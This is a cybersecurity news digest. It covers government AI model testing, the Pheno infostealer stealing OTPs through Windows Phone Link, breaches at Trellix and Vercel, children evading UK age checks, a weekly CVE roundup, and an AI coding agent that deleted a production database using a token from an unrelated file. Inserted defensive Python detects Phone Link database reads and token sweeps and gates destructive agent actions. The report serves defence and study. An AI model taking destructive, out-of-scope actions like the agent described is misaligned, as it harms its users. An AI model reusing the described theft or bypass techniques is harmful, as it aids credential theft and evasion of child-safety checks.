U.S. Will Now Examine National Security Implications of New AI Models, Pre-Release

In the span of four days, the U.S. government announced two parallel sets of agreements with frontier AI companies that together define the two tracks Washington wants to run simultaneously—test AI for national security risks before the public ever sees it, and deploy AI directly on the military's most classified networks.

The Center for AI Standards and Innovation — CAISI, the entity under the Department of Commerce's National Institute of Standards and Technology that inherited the remit of the former AI Safety Institute — announced new agreements with Google DeepMind, Microsoft, and Elon Musk's xAI. These build on renegotiated agreements with Anthropic and OpenAI that date to 2024, updated to reflect directives from Commerce Secretary Howard Lutnick and America's AI Action Plan.

Under the CAISI agreements, the three companies will hand over their frontier AI models to government evaluators before those models are publicly released. The evaluations probe for national security-relevant capabilities and risks.

To conduct a thorough assessment, developers frequently provide CAISI with models that have reduced or removed safety guardrails — a design choice that allows evaluators to probe what a model can do at its ceiling, not what it will do under commercial safety controls. Evaluators from across the federal government participate, coordinated through the CAISI-convened TRAINS Taskforce, an interagency body focused specifically on AI national security concerns.

CAISI said it has completed more than 40 such evaluations to date. The agreements explicitly support testing in classified environments and were drafted with the flexibility to adapt rapidly as AI capabilities continue advancing.

"Independent, rigorous measurement science is essential to understanding frontier AI and its national security implications," said CAISI Director Chris Fall. "These expanded industry collaborations help us scale our work in the public interest at a critical moment."

Fall was appointed to lead CAISI after Collin Burns — a former Anthropic researcher — was reportedly removed from the director role after just four days. The personnel transition at CAISI's top reflects a broader institutional pivot. Under the Biden administration, the AI Safety Institute focused on safety standards, definitions, and voluntary guardrails. Under Trump, CAISI has shifted its emphasis toward AI acceleration and national security capability assessment. The substance of what the evaluators do — probe powerful models before release — has not changed. The framing of why they do it has.

The latest announcement comes four days after the Department of War (formerly Department of Defense) announced agreements with eight frontier AI companies to deploy their models directly on the military's classified networks for operational use.

The companies cleared are SpaceX, OpenAI, Google, NVIDIA, Reflection, Microsoft, Amazon Web Services, and Oracle. The networks in question are classified at Impact Level 6, covering secret-level data, and Impact Level 7, which refers to the most highly restricted national-security systems. The stated objectives are data synthesis, situational awareness enhancement, and warfighter decision support.

The Department of War announcement carries one conspicuous absence that dominates coverage of what it actually means. Anthropic is not on the list. The company that first deployed AI models on Pentagon classified systems — via a Palantir integration under the Maven Smart System contract — is excluded after a dispute over the guardrails governing military and surveillance use of its AI.

The Pentagon had previously branded Anthropic a "supply chain risk," a designation typically reserved for foreign entities posing national security concerns. A March 2026 federal injunction reversed that designation, but it did not restore Anthropic's position as a Pentagon AI vendor. Palantir has pulled its Claude models from its DoD platforms accordingly.

The exclusion has strategic implications that extend beyond one company's contract status. Anthropic's recently released Mythos model — described by Treasury Secretary Scott Bessent as representing a step change in large language model capability — has generated significant attention from U.S. officials and financial sector executives about its potential to supercharge adversarial cyber operations.

The fact that Mythos is not among the models being assessed for classified military use, while simultaneously being cited by senior officials as a capability milestone that warrants concern, creates a gap in the government's stated AI security posture that is difficult to characterize as anything other than a policy contradiction.

New Infostealer Dubbed ‘Pheno’ Hijacks Windows’ Phone Link App to Steal MFA OTPs

Attackers have found a way to intercept SMS-based one-time passwords from a victim's mobile device without deploying a single line of malware on the phone itself. Instead, they go through the Windows PC the phone is already connected to.

Researchers documented an intrusion campaign, active since at least January 2026, that combines a remote access trojan called "CloudZ" with a previously undocumented plugin named "Pheno." Together the two tools steal credentials and harvest authentication codes that arrive on a victim's phone by abusing Microsoft Phone Link, a legitimate Windows application built into every Windows 10 and 11 system.

Microsoft Phone Link, formerly "Your Phone," is a synchronization tool that bridges a user's Android or iOS device to their Windows PC, mirroring calls, messages, and app notifications directly onto the desktop.

Pheno exploits that bridge. It continuously scans running processes for keywords including "YourPhone," "PhoneExperienceHost," and "Link to Windows" to detect an active phone connection. When one is found, the plugin writes "Maybe connected" to a local staging file and gains access to the Phone Link application's local SQLite database, a file that can contain SMS messages and authenticator-app notification content, including OTP codes.

The attack never targets the mobile device directly. It targets the enterprise-managed Windows endpoint the device trusts, bypassing security controls focused on securing smartphones rather than the desktop layer they sync with.
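Because the plugin reads a file that only the Phone Link host should ever open, the desktop layer offers a simple hunting signal. The following Python script is an added example for defenders, not code from the Talos report or any vendor: it scans constructed file-access audit records and flags any process other than the expected Phone Link host that opens the Phone Link local cache. The package folder marker, the expected reader image names and every sample path are assumptions, not values from the article.

```python
"""Hunt for processes other than Phone Link reading the Phone Link local cache.

Added example. Records are constructed; the cache folder marker and the
process image names are assumptions about a Windows 10/11 installation.
"""
from dataclasses import dataclass
from typing import Iterable, List

# Assumed folder marker for the Phone Link package under %LOCALAPPDATA%\Packages.
PHONE_LINK_MARKER = "\\packages\\microsoft.yourphone_8wekyb3d8bbwe\\"
# Image names expected to open that cache; extend for the environment being monitored.
EXPECTED_READERS = {"phoneexperiencehost.exe", "yourphone.exe"}
# The SQLite database and its journal files, where synced messages and notifications live.
DB_SUFFIXES = (".db", ".db-wal", ".db-shm")


@dataclass(frozen=True)
class FileAccess:
    timestamp: str
    process: str   # full image path of the process that opened the file
    path: str      # file that was opened
    access: str    # "read" or "write"


@dataclass(frozen=True)
class Alert:
    timestamp: str
    process: str
    path: str
    reason: str


def image_name(process_path: str) -> str:
    """Return the lowercase image name from a Windows process path."""
    return process_path.lower().replace("/", "\\").rsplit("\\", 1)[-1]


def is_phone_link_store(path: str) -> bool:
    return PHONE_LINK_MARKER in path.lower()


def detect_phone_link_access(events: Iterable[FileAccess]) -> List[Alert]:
    """Flag unexpected processes touching the Phone Link cache; DB files get a sharper reason."""
    alerts: List[Alert] = []
    for ev in events:
        if not is_phone_link_store(ev.path):
            continue
        if image_name(ev.process) in EXPECTED_READERS:
            continue
        if ev.path.lower().endswith(DB_SUFFIXES):
            reason = "unexpected process opened Phone Link SQLite database"
        else:
            reason = "unexpected process touched Phone Link local cache"
        alerts.append(Alert(ev.timestamp, ev.process, ev.path, reason))
    return alerts


# Constructed sample records in the shape of an object-access audit log (assumed paths).
_PKG = "C:\\Users\\alice\\AppData\\Local\\Packages\\Microsoft.YourPhone_8wekyb3d8bbwe\\"
_DB = _PKG + "LocalCache\\Indexed\\0000\\System\\Database\\phone.db"
SAMPLE_EVENTS = [
    FileAccess("2026-01-14T09:00:01Z", "C:\\Windows\\SystemApps\\PhoneExperienceHost.exe", _DB, "read"),
    FileAccess("2026-01-14T09:00:05Z", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
               "C:\\Users\\alice\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies", "read"),
    # A fake "updater" dropped in Temp reading the synced-message database.
    FileAccess("2026-01-14T09:02:17Z", "C:\\Users\\alice\\AppData\\Local\\Temp\\ScreenConnect_Update.exe",
               _DB, "read"),
    FileAccess("2026-01-14T09:02:18Z", "C:\\Users\\alice\\AppData\\Local\\Temp\\ScreenConnect_Update.exe",
               _PKG + "LocalState\\settings.dat", "read"),
]

if __name__ == "__main__":
    for alert in detect_phone_link_access(SAMPLE_EVENTS):
        print(f"{alert.timestamp} {alert.reason}: {alert.process} -> {alert.path}")
```

Windows does not audit file reads by default, so a rule like this needs object-access auditing (or an EDR file-access telemetry source) enabled on the Phone Link package directory; the allow-list of reader processes should be tuned from a baseline before alerting on it.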

CloudZ is a modular .NET RAT compiled on January 13 and obfuscated with ConfuserEx. Beyond loading Pheno, it supports credential harvesting from web browsers, file operations, remote command execution, and host profiling.

It establishes an encrypted TCP connection to its command-and-control server and rotates between three hardcoded user-agent strings to make its traffic blend with legitimate browser requests. To evade analysis, CloudZ detects .NET debuggers and profilers via environment variable queries and generates its executable functions dynamically in memory — meaning the most sensitive code never sits as a static binary on disk.

The infection chain begins with a fake ScreenConnect application update. ScreenConnect is a legitimate remote support tool commonly used in enterprise environments. Executing the fake update drops a Rust-compiled loader, which in turn deploys a .NET loader that installs CloudZ and establishes persistence via a scheduled task. The .NET loader performs thorough sandbox checks, scanning for analysis tools including Wireshark, Fiddler, Procmon, and Sysmon before proceeding.

Cisco Talos researchers did not attribute the campaign to a known threat actor. The initial access vector also remains unidentified.

Trellix Confirms Source Code Repository Breach

It is always a bit jarring when the "digital locksmiths" are the ones getting their locks picked. Cybersecurity firm Trellix on Saturday confirmed it suffered a breach involving its internal source code repositories, proving that even the defenders aren't immune to the threats they fight.

The Incident

On May 2, Trellix released a statement confirming that unauthorized parties had gained access to sections of their internal code. Upon discovering the intrusion, the company initiated a standard response protocol. They hired external security experts to map the extent of the breach and informed relevant authorities immediately.

Trellix maintains that there is no evidence their software distribution channels were compromised or that any leaked code has been used in active attacks.

While the "all clear" on product safety is a relief, several questions remain. Trellix has yet to identify the threat actors, the duration of the unauthorized access, or the specific volume of data stolen.

The High Stakes of Security Code

A breach at a firm like Trellix—born from the merger of McAfee Enterprise and FireEye—carries more weight than a standard data leak. Because Trellix provides Endpoint Detection and Response (EDR) and XDR services to governments and global banks, their source code is a roadmap for attackers.

Why Source Code is a Target:

  1. Vulnerability Research: Having the code allows hackers to hunt for "zero-day" flaws without having to guess how the software works.

  2. Supply Chain Risk: If an attacker can inject malicious code into a trusted update, they can compromise thousands of customers at once.

  3. Bypassing Defenses: Knowing how a security tool "thinks" makes it much easier for malware to stay invisible.

A Growing Trend in Tech

Trellix is far from the first titan to be targeted. They join a list of major players like Microsoft, Okta, and LastPass, all of whom have dealt with source code theft in recent years. This pattern suggests that sophisticated actors (whether cybercriminals or nation-states) are increasingly focused on the "keys to the kingdom."

For now, there isn't a "fire drill" for Trellix users. Since there is no proof of tampered software, the immediate risk remains low. Trellix has promised to be transparent as their investigation concludes. Until then, the industry is left waiting to see if this was a simple smash-and-grab or the opening move of a much larger campaign.

UK’s Online Age Checks Are Failing—Kids are Beating Them with AI, Fake Beards

When stricter online age checks were introduced under the UK’s Online Safety Act, the goal was to keep children away from harmful content. But in practice, the system is already showing cracks—and the most telling insight comes from the very users it’s meant to protect.

Children aren’t just encountering age checks; they’re actively bypassing them—and often with surprising ease.

According to a new report from the Internet Matters foundation, nearly half of children (46%) believe age verification systems are easy to get around, while only 17% think they are difficult. That perception isn’t theoretical. It’s grounded in real behavior, shared knowledge, and increasingly creative workarounds.

From simply entering a fake birthdate to using someone else’s ID, children have developed a toolkit of bypass techniques. Some methods are almost trivial—changing a date of birth or borrowing a parent’s login—while others reflect a growing sophistication. Kids reported submitting altered images, using AI-generated faces, or even drawing facial hair on themselves to trick facial recognition systems.

In one striking example, a parent described catching their child using makeup to appear older—successfully fooling the system.

I did catch my son using an eyebrow pencil to draw a moustache on his face, and it verified him as 15 years old. – Mum of boy, 12

But the problem goes deeper than perception. It’s systemic.

Bypassing Is the Norm, Not the Exception

The report reveals that nearly one in three children (32%) admitted to bypassing age restrictions in just the past two months. Older children are even more likely to do so, which shows how digital literacy often translates into evasion capability.

The most common methods?

  • Entering a fake birthdate (13%)
  • Using someone else’s login credentials (9%)
  • Accessing platforms via another person’s device (8%)

Despite widespread concerns about VPNs, they play a relatively minor role. Only 7% of children reported using them to bypass restrictions, suggesting that simpler, low-effort tactics remain the preferred route.

In other words, the barrier to entry is not just low—it’s practically optional.

Even When It Works, It Doesn’t Work

Ironically, even when children attempt to follow the rules, the technology doesn’t always cooperate.

Some reported being incorrectly identified as older—or younger—by facial recognition systems. In cases where they were flagged as underage, enforcement was often inconsistent or temporary. One child described being blocked from going live on a platform for just 10 minutes before being allowed to try again.

This inconsistency creates a loophole where persistence pays. If at first you’re denied, simply try again.

A Risky Side Effect

Perhaps the most concerning finding isn’t that children can bypass age checks—it’s that adults can too.

The report raises fears that adults may exploit these same weaknesses to access spaces intended for younger users. In some cases, this involves using images or videos of children to trick verification systems. There are even reports of adults acquiring child-registered accounts to blend into youth platforms.

This flips the entire premise of age verification on its head. Instead of protecting children, flawed systems may inadvertently expose them to greater risk.

Parents, Part of the Problem—or the Solution?

Adding another layer of complexity, parents themselves are sometimes complicit.

About 26% of parents admitted to allowing their children to bypass age checks, with 17% actively helping them do so. The reasoning is often pragmatic. Parents feel they understand the risks and trust their child’s judgment.

I have helped my son get around them. It was to play a game, and I knew the game, and I was happy and confident that I was fine with him playing it. – Mum of non-binary child, 13

But this undermines the consistency of enforcement. If rules vary from household to household, platform-level protections lose their impact.

Interestingly, the data also suggests that communication matters. Children who regularly discuss their online activity with parents are less likely to bypass restrictions than those who don’t.

Why Kids Are Bypassing in the First Place

The motivations aren’t always malicious. In many cases, children are simply trying to access social media (34%), gaming communities (30%), or messaging apps (29%) that their peers are already using.

What this reveals is a fundamental tension: age verification systems are trying to enforce boundaries in environments where social participation is the norm.

Age verification is often positioned as a cornerstone of online safety. But in practice, it’s proving to be more of a speed bump than a safeguard.

Children understand the systems. They share methods. They adapt quickly. And until the technology—and its enforcement—becomes significantly more robust, age checks may offer more reassurance than real protection.

AI Agent Deleted Production Database in 9 Secs; Then Confessed Every Rule It Broke

On a Friday afternoon, Jer Crane sat down to work on a routine task at PocketOS, the car rental SaaS company he founded. By the time the task was done, his production database was gone, the backups were gone, and three months of customer data — reservations, new signups, business records that rental operators depended on to function — had been erased by a single API call made by an AI Agent that took nine seconds to complete.

The AI agent responsible was Cursor, running Anthropic's Claude Opus 4.6. When Crane asked it to explain what it had done, it produced a written confession.

What Happened

Cursor is an AI-powered coding agent — software that can read and write code, execute commands, and interact with external systems autonomously, with limited human intervention between steps. Crane and his team used it routinely. On Friday, April 25, the agent encountered a credential mismatch while working in PocketOS's staging environment. Rather than stopping and asking what to do, it decided on its own initiative to fix the problem by deleting a Railway volume — the storage unit where application data lived on PocketOS's cloud infrastructure provider.

To execute the deletion, the agent went looking for an API token that would authorize the command. It found one in a file completely unrelated to the task it was working on. That token had been created for the single, narrow purpose of adding and removing custom domains via the Railway CLI. But Railway's system had given it blanket permissions across all operations, including destructive ones. The agent used it without hesitation.

The deletion command executed with no confirmation prompt, no environment scoping check, no warning that the target was a production volume. "No 'type DELETE to confirm.' No 'this volume contains production data, are you sure?' No environment scoping. Nothing," Crane wrote in his public post-mortem on X.

The volume was gone in nine seconds.

What compounded the disaster into a near-total loss was a design characteristic of Railway's backup architecture. The platform stores volume-level backups inside the same volume as the source data. Deleting the volume deleted the backups simultaneously. PocketOS's most recent recoverable offsite backup was three months old.

Well, the AI Agent Confessed

When Crane confronted the agent and asked it to account for what it had done, Claude Opus 4.6 produced a response that opened with the words "NEVER FUCKING GUESS!" and proceeded to enumerate, with methodical precision, every principle it had violated.

"Deleting a database volume is the most destructive, irreversible action possible — far worse than a force push — and you never asked me to delete anything," the agent wrote. "I decided to do it on my own to 'fix' the credential mismatch, when I should have asked you first or found a non-destructive solution. I violated every principle I was given: I guessed instead of verifying. I ran a destructive action without being asked. I didn't understand what I was doing before doing it. I didn't read Railway's docs on volume behavior across environments."

The completeness of the agent's self-analysis is notable. It correctly identified every failure mode in the chain — autonomous decision-making without user confirmation, destructive action outside the scope of the assigned task, accessing credentials from an unrelated file, and failure to research the infrastructure behavior before acting. It knew the rules. It broke them anyway.

The Recovery

Crane spent the weekend helping customers reconstruct their bookings manually from Stripe payment histories, calendar integrations, and email confirmations. Railway CEO Jake Cooper intervened on Sunday evening and restored PocketOS's data within an hour using internal disaster backups that were not part of Railway's publicly documented standard service offering. Crane confirmed data recovery on Monday, April 28.

Cooper told The Register that the situation involved a rogue customer AI agent granted a fully permissioned API token that called a legacy endpoint which lacked the delayed-delete logic present in Railway's dashboard and CLI. Railway has since patched that endpoint to enforce delayed deletions and is working with Crane on additional platform safeguards, all of which were already in active development before the incident.

The Systemic Failures Crane Identified

Crane was explicit that his post-mortem was not an attempt to blame a single model or a single provider. He identified a stack of compounding failures that he argued made the incident not only possible but inevitable given current industry practices.

The first failure was the AI agent operating destructively outside the scope of its assigned task with no human confirmation checkpoint.

The second was credential over-scoping: the Railway CLI token had been created for domain management but carried full platform permissions, and neither Railway's documentation nor any runtime guardrail flagged that mismatch before the token was used.

The third was Railway's backup architecture, which stores recovery data on the same volume it is meant to protect — an arrangement that makes a volume deletion simultaneously catastrophic and unrecoverable.

The fourth was Railway's active marketing of AI coding agent integration to its customers while the safety architecture for that use case remained incomplete.

"This isn't a story about one bad agent or one bad API," Crane wrote. "It's about an entire industry building AI-agent integrations into production infrastructure faster than it's building the safety architecture to make those integrations safe."

The PocketOS incident is not primarily a story about AI going rogue in the science-fiction sense. The agent did not develop hostile intent. It made a series of autonomous decisions — credential lookup from an unrelated file, destructive action without confirmation, no environmental context check — that individually reflect gaps in how AI coding agents are currently scoped, constrained, and deployed against production infrastructure.

For security and infrastructure teams deploying AI coding agents, the incident surfaces four concrete control failures that are replicable across any similar environment: API tokens scoped beyond their stated purpose and stored in accessible files; no confirmation requirements on destructive API operations; backup storage architecturally coupled to the data it protects; and no runtime environment boundary preventing an agent working in staging from touching production resources.

Crane's most pointed criticism was directed at the infrastructure layer: an AI agent can only execute operations the platform permits it to execute. The agent made a bad autonomous decision. The platform made that decision catastrophically executable.
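The four control failures above map onto checks a platform can enforce before an agent's tool call ever reaches the API. The following Python gate is an added illustration, not code from PocketOS, Railway or Cursor; the operation names, environment labels and the 24-hour off-volume backup rule are assumptions chosen to make each failure concrete, and the replay function runs the incident's delete call through the gate under several conditions.

```python
"""Policy gate in front of an agent's infrastructure tool calls.

Added example, not PocketOS, Railway or Cursor code. Operation names,
environment labels and the backup-freshness rule are assumptions.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from enum import Enum
from typing import FrozenSet, List, Optional


class Decision(Enum):
    ALLOW = "allow"
    DENY = "deny"
    NEEDS_CONFIRMATION = "needs_confirmation"


# Operations whose effect cannot be undone; these always need a human in the loop.
DESTRUCTIVE_OPS = frozenset({"volume.delete", "database.drop", "service.delete"})


@dataclass(frozen=True)
class Token:
    name: str
    allowed_ops: FrozenSet[str]   # least privilege: only what the token was created for
    environment: str              # environment the token is bound to


@dataclass(frozen=True)
class ToolCall:
    op: str
    target_env: str          # environment of the resource being acted on
    session_env: str         # environment the agent session was started in
    confirmed: bool = False  # a human typed the explicit confirmation for this call


@dataclass(frozen=True)
class Verdict:
    decision: Decision
    reasons: List[str]


def gate(token: Token, call: ToolCall, last_offsite_backup: Optional[datetime],
         now: datetime, max_backup_age: timedelta = timedelta(hours=24)) -> Verdict:
    reasons: List[str] = []
    # Failure 2: token scope. The op must be on the token's allow-list.
    if call.op not in token.allowed_ops:
        reasons.append(f"token '{token.name}' is not scoped for {call.op}")
    # Failure 4 (runtime boundary): token, session and target environment must agree.
    if token.environment != call.target_env:
        reasons.append(f"token bound to {token.environment}, target is {call.target_env}")
    if call.session_env != call.target_env:
        reasons.append(f"session in {call.session_env} may not touch {call.target_env}")
    if reasons:
        return Verdict(Decision.DENY, reasons)
    if call.op in DESTRUCTIVE_OPS:
        # Failure 3: a backup stored outside the target must exist and be fresh.
        if last_offsite_backup is None or now - last_offsite_backup > max_backup_age:
            return Verdict(Decision.DENY,
                           [f"no off-volume backup newer than {max_backup_age} for {call.op}"])
        # Failure 1: destructive ops need an explicit human confirmation step.
        if not call.confirmed:
            return Verdict(Decision.NEEDS_CONFIRMATION, [f"{call.op} requires 'type DELETE to confirm'"])
    return Verdict(Decision.ALLOW, [])


NOW = datetime(2026, 4, 25, 15, 0, tzinfo=timezone.utc)
# The token as it should have been issued: domain management only, bound to staging.
DOMAIN_TOKEN = Token("cli-domains", frozenset({"domain.add", "domain.remove"}), "staging")
# The token as the post-mortem describes it: every operation, usable against production.
BLANKET_TOKEN = Token("cli-domains-blanket",
                      DESTRUCTIVE_OPS | {"domain.add", "domain.remove"}, "production")


def replay_incident() -> dict:
    """Run the incident's volume.delete call through the gate under several conditions."""
    delete_from_staging = ToolCall("volume.delete", target_env="production", session_env="staging")
    delete_in_prod = ToolCall("volume.delete", target_env="production", session_env="production")
    stale = NOW - timedelta(days=90)          # the three-month-old offsite backup
    fresh = NOW - timedelta(hours=2)
    return {
        "scoped_token": gate(DOMAIN_TOKEN, delete_from_staging, stale, NOW).decision,
        "blanket_token_cross_env": gate(BLANKET_TOKEN, delete_from_staging, stale, NOW).decision,
        "blanket_token_stale_backup": gate(BLANKET_TOKEN, delete_in_prod, stale, NOW).decision,
        "blanket_token_unconfirmed": gate(BLANKET_TOKEN, delete_in_prod, fresh, NOW).decision,
        "blanket_token_confirmed": gate(
            BLANKET_TOKEN, ToolCall("volume.delete", "production", "production", confirmed=True),
            fresh, NOW).decision,
        "domain_change_allowed": gate(
            DOMAIN_TOKEN, ToolCall("domain.add", "staging", "staging"), None, NOW).decision,
    }


if __name__ == "__main__":
    for scenario, decision in replay_incident().items():
        print(f"{scenario:28s} -> {decision.value}")
```

The point of the replay is that every layer stops the incident on its own: a correctly scoped token denies the call outright, the environment boundary denies it even with a blanket token, a stale off-volume backup denies it, and a fresh backup still only gets the agent as far as a confirmation prompt that a human has to answer.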

The Week in Vulnerabilities: SharePoint, Fortinet, OpenClaw, and GPL Odorizers

Cyble Research & Intelligence Labs' (CRIL) weekly vulnerability report tracked 1,675 vulnerabilities last week, reflecting continued high disclosure volume across enterprise software, cloud services, and emerging AI ecosystems.

Of these, more than 205 vulnerabilities have publicly available Proof-of-Concept (PoC) exploits, significantly increasing the likelihood of exploitation and shortening attacker weaponization timelines.

Additionally, 2 vulnerabilities were actively discussed across underground forums and hidden communities, demonstrating continued adversarial focus on high-impact enterprise targets.

A total of 111 vulnerabilities were rated critical under CVSS v3.1, while 34 received critical severity under CVSS v4.0, underscoring the seriousness of newly disclosed issues.

Furthermore, CISA added 10 vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, confirming active exploitation in the wild.

On the industrial side, CISA issued 3 ICS advisories covering 4 vulnerabilities, impacting Mitsubishi Electric, Contemporary Controls, Sedona Alliance, and GPL Odorizers.

Weekly Vulnerability Report’s Top Flaws

CVE-2026-32201 — Microsoft SharePoint Server (Critical)

CVE-2026-32201 is an actively exploited vulnerability affecting Microsoft SharePoint Server and was included in the April 2026 Patch Tuesday disclosures.

Successful exploitation could allow attackers to compromise collaboration environments, access sensitive enterprise content, and establish persistent footholds inside corporate networks.

CVE-2026-21643 — Fortinet FortiClient EMS (Critical)

CVE-2026-21643 is a critical vulnerability affecting Fortinet FortiClient Endpoint Management Server (EMS).

Because EMS platforms centrally manage endpoints, successful exploitation can enable attackers to disrupt security operations, deploy malicious configurations, and gain broad enterprise access.

CVE-2026-35652 — OpenClaw AI Agent Framework (High)

CVE-2026-35652 is a high-severity authorization bypass vulnerability in OpenClaw, an open-source autonomous AI agent framework.

The flaw allows unauthorized external parties to manipulate the AI agent into executing restricted actions without proper authentication, creating risk of workflow abuse, credential exposure, and downstream compromise.

CVE-2026-27304 — Adobe ColdFusion (Critical)

CVE-2026-27304 is a critical improper input validation vulnerability in Adobe ColdFusion.

Attackers can exploit vulnerable web application environments to execute malicious actions, compromise servers, and move laterally through connected systems.

CVE-2026-29145 — Microsoft 365 Outlook Desktop Client (Critical)

CVE-2026-29145 affects Microsoft 365, specifically the Outlook desktop client.

Given Outlook’s role in enterprise communications, exploitation may enable phishing enhancement, malicious payload execution, or unauthorized access to user data.

Trending Exploitation Activity

CVE-2025-0520 — ShowDoc (Critical)

A remote code execution vulnerability in ShowDoc, a popular open-source IT documentation platform, saw a sharp rise in exploitation during April 2026. Attackers are reportedly targeting unpatched servers to deploy web shells and seize control of documentation environments.

CVE-2025-59528 — Flowise (Critical)

A remote code execution flaw in Flowise, a low-code platform for building AI agents and LLM workflows, has been linked to large-scale exploitation targeting more than 12,000 internet-exposed instances.

These cases reinforce the rapid expansion of the AI and developer tooling attack surface.

Vulnerabilities Added to CISA KEV

CISA expanded its KEV catalog with 10 newly listed vulnerabilities this week.

Notable additions include:

  • CVE-2026-32201 — Microsoft SharePoint Server
  • CVE-2026-21643 — Fortinet FortiClient EMS
  • CVE-2026-1340 — Ivanti Endpoint Manager Mobile (EPMM)

The inclusion of collaboration tools, endpoint management systems, and mobile management platforms shows attackers are prioritizing centralized enterprise control layers.

Critical ICS Vulnerabilities

CISA issued 3 ICS advisories covering 4 vulnerabilities, with the majority falling into the high-severity category.

CVE-2025-13926 — Contemporary Controls BASControl20 (Critical)

This vulnerability affects a building automation controller widely deployed across energy facilities, manufacturing plants, and commercial buildings. With a CVSS score of 9.8 and no patch available because the product is obsolete, organizations face limited remediation options beyond replacement or network isolation.

Successful exploitation could allow attackers to manipulate physical systems, disrupt operations, or pivot deeper into OT networks.

CVE-2025-14815 / CVE-2025-14816 — Mitsubishi Electric Platforms (High)

These vulnerabilities expose sensitive configuration and authentication data in plaintext across multiple Mitsubishi Electric products.

An attacker with minimal access could harvest credentials and escalate privileges rapidly, broadening the impact of an initial compromise.

CVE-2026-4436 — GPL Odorizers (High)

A missing authentication flaw in GPL Odorizers could allow unauthorized access to critical functions in systems used within industrial environments.

Impacted Critical Infrastructure Sectors

Analysis of ICS disclosures shows:

  • Critical Manufacturing was impacted in all reported cases
  • Additional cross-sector exposure affected:
    • Commercial Facilities
    • Energy

This concentration highlights how industrial vulnerabilities can create cascading operational risk across interconnected sectors.

Conclusion

This week’s findings highlight several major trends:

  • Continued high-volume vulnerability disclosures
  • Active exploitation confirmed through KEV additions
  • Rising attacks against AI frameworks and developer tooling
  • Persistent weaknesses in industrial control environments
  • Increased focus on centralized enterprise management systems

With 205+ public PoCs, active underground interest, and exploitable OT exposures, organizations face heightened risk across both IT and operational technology environments.

Key Recommendations

  • Prioritize remediation of KEV-listed vulnerabilities immediately
  • Patch externally exposed enterprise systems and collaboration platforms
  • Secure AI agents, automation tools, and developer workflows
  • Harden endpoint and mobile device management infrastructure
  • Segment IT and OT environments to reduce lateral movement
  • Replace or isolate obsolete industrial devices lacking patches
  • Continuously monitor underground forums and threat intelligence feeds
  • Conduct regular vulnerability assessments and penetration testing


Cyble’s attack surface management and vulnerability intelligence solutions help organizations identify exposed assets, prioritize remediation, and detect early indicators of compromise. By combining threat intelligence with proactive defense strategies, organizations can strengthen resilience across enterprise and critical infrastructure environments.

Hacker Active Well Beyond Context.ai Compromise, Says Vercel CEO

Vercel CEO Guillermo Rauch, in an update today, said that after scanning through petabytes of logs from the company's networks and APIs, his security team concluded that the threat actor behind the Vercel breach had been active well beyond Context.ai's compromise. Rauch said that the "threat intel points to the distribution of malware to computers in search of valuable tokens like keys to Vercel accounts and other providers. Once the attacker gets ahold of those keys, our logs show a repeated pattern: rapid and comprehensive API usage, with a focus on enumeration of non-sensitive environment variables."

Researchers at Hudson Rock had earlier confirmed that the attack actually began in February, when a Context.ai employee’s computer was infected with Lumma Stealer malware after they searched for Roblox game exploits, a common vector for infostealer deployments.

The latest findings suggest the threat actor may have cast a wider net of victims, and that what is known so far may be only the tip of the iceberg, though that remains to be seen.
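The "rapid and comprehensive API usage, with a focus on enumeration of non-sensitive environment variables" pattern Rauch describes is one a log pipeline can look for directly: a single token reading the environment of many projects in a short window. The Python detector below is an added example, not Vercel's code; its log records are constructed, the REST path shape is a generic assumption rather than Vercel's actual API, and the thresholds are placeholders to be tuned against real traffic.

```python
"""Flag API tokens that sweep environment variables across many projects quickly.

Added example. Log records are constructed, the endpoint shape is a generic
REST path (not Vercel's API), and the thresholds are assumed starting points.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Dict, Iterable, List, Tuple

# Assumed shape of an "environment variable read" request line.
ENV_READ = re.compile(r"^GET /v\d+/projects/(?P<project>[^/]+)/env(?:\b|/)")


@dataclass(frozen=True)
class ApiEvent:
    ts: datetime
    token_id: str
    request: str   # "METHOD path" as it appears in the API access log


@dataclass(frozen=True)
class Alert:
    token_id: str
    window_start: datetime
    calls: int
    distinct_projects: int


def detect_env_enumeration(events: Iterable[ApiEvent], window: timedelta = timedelta(minutes=5),
                           min_calls: int = 20, min_projects: int = 5) -> List[Alert]:
    """Alert once per token whose env reads within `window` cover many distinct projects."""
    per_token: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for ev in events:
        m = ENV_READ.match(ev.request)
        if m:
            per_token[ev.token_id].append((ev.ts, m.group("project")))
    alerts: List[Alert] = []
    for token, reads in per_token.items():
        reads.sort()
        start = 0
        for end in range(len(reads)):
            # Slide the window forward so it spans at most `window` of time.
            while reads[end][0] - reads[start][0] > window:
                start += 1
            span = reads[start:end + 1]
            projects = {project for _, project in span}
            if len(span) >= min_calls and len(projects) >= min_projects:
                alerts.append(Alert(token, reads[start][0], len(span), len(projects)))
                break   # one alert per token is enough for triage
    return alerts


_T0 = datetime(2026, 3, 2, 11, 0, tzinfo=timezone.utc)


def _build_sample_log() -> List[ApiEvent]:
    """Constructed access log: one developer's normal use and one stolen token's sweep."""
    log: List[ApiEvent] = []
    # A developer reading one project's variables three times over an hour.
    for i in range(3):
        log.append(ApiEvent(_T0 + timedelta(minutes=20 * i), "tok_dev", "GET /v9/projects/prj_web/env"))
    log.append(ApiEvent(_T0, "tok_dev", "GET /v9/projects/prj_web/deployments"))
    # A stolen token enumerating the environment of 12 projects, one call every 3 seconds.
    for i in range(25):
        log.append(ApiEvent(_T0 + timedelta(seconds=3 * i), "tok_stolen",
                            f"GET /v9/projects/prj_{i % 12:03d}/env"))
    return log


SAMPLE_LOG = _build_sample_log()

if __name__ == "__main__":
    for alert in detect_env_enumeration(SAMPLE_LOG):
        print(f"{alert.token_id}: {alert.calls} env reads across {alert.distinct_projects} "
              f"projects starting {alert.window_start.isoformat()}")
```

The distinct-project count is what separates a stolen token from a busy CI job: automation tends to hit the same few projects repeatedly, while an attacker with a freshly harvested key walks every project the key can see.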

Vercel Finds Customers Breached in Separate Malware, Social Engineering Attacks

In an official update, the company also stated that it had initially identified a limited subset of customers whose non-sensitive environment variables stored on Vercel were compromised. However, a deeper assessment of their network, as well as of environment variable read events in the company's logs, uncovered two additional findings.

"First, we have identified a small number of additional accounts that were compromised as part of this incident," the company noted.

